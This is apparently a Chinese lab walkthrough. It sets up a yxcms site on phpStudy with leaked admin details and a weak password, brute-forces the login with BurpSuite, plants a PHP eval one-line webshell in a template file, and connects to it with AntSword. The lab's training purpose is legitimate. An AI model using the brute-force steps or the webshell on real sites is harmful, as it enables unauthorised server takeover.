01 环境部署

（1）yxcms

yxcms 基于 PHP+MySQL 开发，这是一个采用轻量级 MVC 设计模式的网站管理系统。轻量级 MVC 设计模型使网站系统更加紧凑，且支持自定义表功能，使整个网站的数据结构设计更为灵活，也可以支持将图集、文章拓展成为其他实例，比如展品、分类等栏目。

本靶场中将使用 YXCMS 作为 Windows 7 边界服务器上开启的 Web 应用。

（2）phpStudy

phpStudy 是一款用于进行 PHP 环境调试的程序集成软件包。在软件安装后便
启动了 MySQL 服务、Apache 服务、PHP 设置等模块，是一款便捷的 PHP 环境调试工具。

phpStudy 在本靶场中用于在 Windows 7 上搭建 Web 服务。

02 漏洞配置

（1）消息泄漏

敏感数据主要包括：口令、证书、隐私数据、授权凭据、个人数据等，在网站
说明、程序文件、日志文件中都有可能包含敏感数据。

在攻击者进行测试的时候，通常有两种方法，一是利用工具检测，如用BurpSuite 的爬虫模块进行网站信息爬取，从获得敏感的数据信息。

二是通过手工挖掘，在浏览器中 F12 查看网页源代码，观察源代码中是否泄漏相关接口，从而发现敏感信息。该漏洞可能造成的风险是：攻击者利用上述方式对相关网站进行敏感情报收集，进而针对性地进行漏洞利用攻击。

本靶场配置了 yxcms 管理员后台地址、管理员默认账号密码消息泄漏，如下图
所示：




（2）管理员后台暴力爆破

暴力破解是专用于密码的破解方法，其破解方式为对密码进行逐个猜测，直至
推算到正确密码为止。它通常在网站登录系统上被使用，通过锁定已知的管理员的
账户名，对其可能的登录密码进行逐个尝试破解。

在攻击者进行测试的时候，通常的攻击方式是，首先寻找到网站后台登录页面。
再使用 BurpSuite 捕获登录行为数据包，将该数据包转发到 Intruder 利用模块，
并将其密码参数设置为变量，将有效载荷添加入攻击列表开始攻击，而后观察返回
包的字节长度，以此判断是否攻击成功。

该漏洞可能造成的风险是：攻击者利用弱口令登录网站管理员后台，以管理员权限进行恶意破坏。

本靶场配置了 yxcms 管理员账号 admin/admin123 弱口令，如下图所示。

03 利用方式

访问 yxcms页面，浏览网页相关消息。发现页面首页提示后台登录地址：http://192.168.40.133/yxcms/index.php?r=admin

尝试访问并用默认口令 admin/123456 登录，发现登录失败






利用 BurpSuite 代理工具对管理员账号密码进行暴力破解，加载弱口令字典，
发现弱密码 admin123 成功登录


使用 admin/admin123 成功登录 CMS管理员后台后，找到模板编辑处，往 index_index.php 中，插入一句话：

<?php eval($_POST["jkxy"])；?>

中国蚁剑连接 http://192.168.239.202/yxcms/index.php，使用 ipconfig 命
令进行虚拟终端功能测试，发现能成功返回 Windows 7 服务器 IP 地址
192.168.40.133


测试中国蚁剑文件管理功能，发现成功回显 webshell 所在目录C:/phpStudy/WWW/yxcms/public，说明中国蚁剑成功连接 webshell



至此攻击者通过yxcms弱口令至getshell，成功获取服务器权限。

04 修复方案

及时修改用户口令，确保密码强度符合要求，建议大小写字母+数字+特殊字符+8位以上。